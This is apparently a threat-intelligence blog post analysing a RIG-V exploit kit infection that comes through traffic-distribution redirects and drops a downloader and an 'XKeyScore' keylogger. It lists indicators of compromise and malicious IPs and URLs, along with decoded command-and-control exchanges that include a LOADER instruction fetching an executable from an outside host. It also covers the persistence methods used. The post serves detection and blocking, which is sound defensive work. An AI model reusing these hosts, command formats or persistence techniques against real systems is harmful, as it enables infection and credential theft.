302 Redirects from Traffic Distribution System Led to RIG-V EK at 194.87.238.156. Dropped Downloader & “XKeyScore” Keylogger

IOCs:

  • GET /in/traf/ – 302 redirect via port 18001 (BossTDS port)
  • GET /boom/mix.php – 302 redirect via port 18001 (BossTDS port)
  • 194.87.238.156 – try.uludan.com – Rig-V EK (landing page, Flash exploit, and payload)
  • 111.221.47.162 – POST /faa38820fa/dd6c45917a/d23d3e97c0/chat.php – Base64 encoded data being POSTed back
  • 188.40.248.71 – GET /~mysuperp/crypt2_7038.exe – Additional malware downloaded
  • 91.107.108.124 – POST /log/index.php – Keylogger POSTing keystrokes (Win.Trojan.Amasages variant outbound connection)
  • Post infection DNS queries:
    • envioenvio.fromru.su (ET DNS Query for .su TLD (Soviet Union) Often Malware Related)
    • polikko.eu (ET TROJAN Possible Kelihos .eu CnC Domain Generation Algorithm (DGA) Lookup NXDOMAIN Response)

Traffic:

traffic-edited

additional-malware-downloaded-and-new-post-request

ET Alerts:

et-alerts-2

Hashes:

Picture of Site:

malicious-site-1

Infection Chain:

This site doesn’t appear to be a site that anyone would go to directly. To me it appears like a domain that user’s are redirected to.

For example, I originally discovered this site in my customers network traffic after they visited sites used to watch live streaming sporting events.

Unfortunately, this customer doesn’t give me packets (sad face) so I can’t confirm that the referer for this incident (although sports streaming sites are full of unwanted redirections). Also, I tried to recreate the traffic but was unsuccessful.

Finally, I thought why not try and go directly to the domain and was immediately redirected to a TDS server via an iframe:

malicious-site-edited

The destination port being used for the redirection is TCP port 18001, which is used by BossTDS. TDS, short for Traffic Distribution System, has been used by cyber criminals before as a means to distribute malware. Click HERE to read more about how TDS has been used to distribute malware.

Here is the TCP stream showing that the requested resource located at at the TDS server returning a 302 found:

tds-1-edited

The host was then redirected to /boom/mix[.]php and the server again returned another 302:

tds-second-302-found-edited

As you can see the second 302 found points directly to a Rig-V Exploit Kit landing page.

Here is a little bit of the obfuscated code that was found on the landing page:

landing-page-edited

Here is the landing page partially deobfuscated (Thanks to my coworker “elf” for doing the deobfuscation):

deobfuscated-landing-page

You can see the URL for the Flash exploit on the landing page and the URL for the payload.

After the host was redirected to the landing page we can see the Flash exploit being requested and sent back to the host:

flash-exploit

This Flash exploit was exploiting CVE-2015-8651 (Flash up to 20.0.0.228/235). Following the Flash exploit we see two identical requests for the payload, which was dropped in %TEMP%:

payload-1payload-2temp

The file is also created in AppData\Roaming\YFFjZF9i\sirhcqngr.exe, which is showing as a running process under the description “Graph Microsoft”:

We can also see that it created the following registry key under HKEY_CURRENT_USER\Software\YFFjZF9i:

regedit

The value for “a” is “aHR0cDovLzExMS4yMjEuNDcuMTYyL2ZhYTM4ODIwZmEvZGQ2YzQ1OTE3YS9kMjNkM2U5N2MwL2NoYXQucGhw”, which decodes to the following:

  • hxxp://111.221.47.162/faa38820fa/dd6c45917a/d23d3e97c0/chat.php

This is the URL used to POST base64 encoded data back to the server. Here is the first POST request to 111.221.47.162:

first-post-request-to-111-221-47-162

Notice the first POST contains the variable “_wv=” and is assigned to the base64 text string “ZW50ZXI.” “ZW50ZXI” decodes to the command “enter”.

The server responds with a 404 error page and its own base64 encoded string “c3VjY2Vzcw,” which decodes to “success”.

Once the infected machine receives the message the malware responds with the same cookie-auth browser agent (auth=bc00595440e801f8a5d2a2ad13b9791b), along with a reply containing encoded data:

second-post-containing-system-information

The infected machine is POSTing back base64 encoded data in the following format:

  • cmd&<GUID of Machine >&<Logged-in Username: System Name: Domain Name>&<Windows Version and Platform> &<AV product Info>&<Date and Time of Execution>

The response from the server is this chunk of base64 data “MTQ2OTEwMDA5Njg4MjAwMCNib3RraWxsZXIjMTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj”. This decodes to the following:

  • 1469100096882000#botkiller#1401076386715766#rate 5#

We can also see that there is a .vbs file in the user’s Startup folder containing the following command:

vbs-in-startup-folderwscript-shell-run

After letting the system sit for awhile I found it made a similar POST request as before, however this time the server responded with encoded data containing a download URL for additional malware:

second-post-containing-url-for-additional-malware

The base64 contained in the response decodes to:

  • 1469100096882000#botkiller#1401076386715766#rate 5#1480369403542508#LOADER hxxp://188.40.248.71/~mysuperp/crypt2_7038.exe

We then see the host make a GET request for the additional malware (crypt2_7038.exe):

trojan-downloaded-additional-malware

There is an additional file (NN6B09.tmp) created in %TEMP% and the file “winsvc.exe” dropped in Startup:

Following the execution of winsvc.exe we see POST request to 91.107.108.124 – POST /log/index.php, which contains encoded data (partial image of POST request):

post-screenshot

However, taking a closer look at the POSTed data we can actually see that it is a screenshot of my desktop and it is being tagged with my username (Home) and MAC address (blacked out). Using http://www.url-encode-decode.com/ to decode the data we can see the image being sent over the wire:

posted-screenshot

ET alerted on this traffic as a keylogger POSTing keystrokes (Win.Trojan.Amasages variant outbound connection). This is true as going to Chase.com and entering in fake credentials shows that they were POSTed back to server (along with typos), as well as documenting what browser I’m using, the time of the traffic, the folders and programs that I have open, and the websites that are open:

chase-posting

keylogger

As always, I recommend blocking the IPs and domains listed in the IOCs section.

Reference:

  • Shout-out to Twitter user @luutala for giving me the following reference which helped in augmenting my investigation
  • https://securingtomorrow.mcafee.com/mcafee-labs/teslacrypt-arrives-via-neutrino-exploit-kit/

UPDATE

On December 13th, 2016, @sysopfb informed me that, judging by the name from the panel source, the keylogger is calling itself XKeyScore.

Panel login for “XKeyScore”:

xkeyscore-control-panel-login

XKEYSCORE (abbreviated as XKS) is also the name of a formerly secret computer system first used by the United States National Security Agency for searching and analyzing global Internet data.

malwarebreakdown

Just a normal person who spends their free time infecting systems with malware.

Leave a Comment

%d bloggers like this: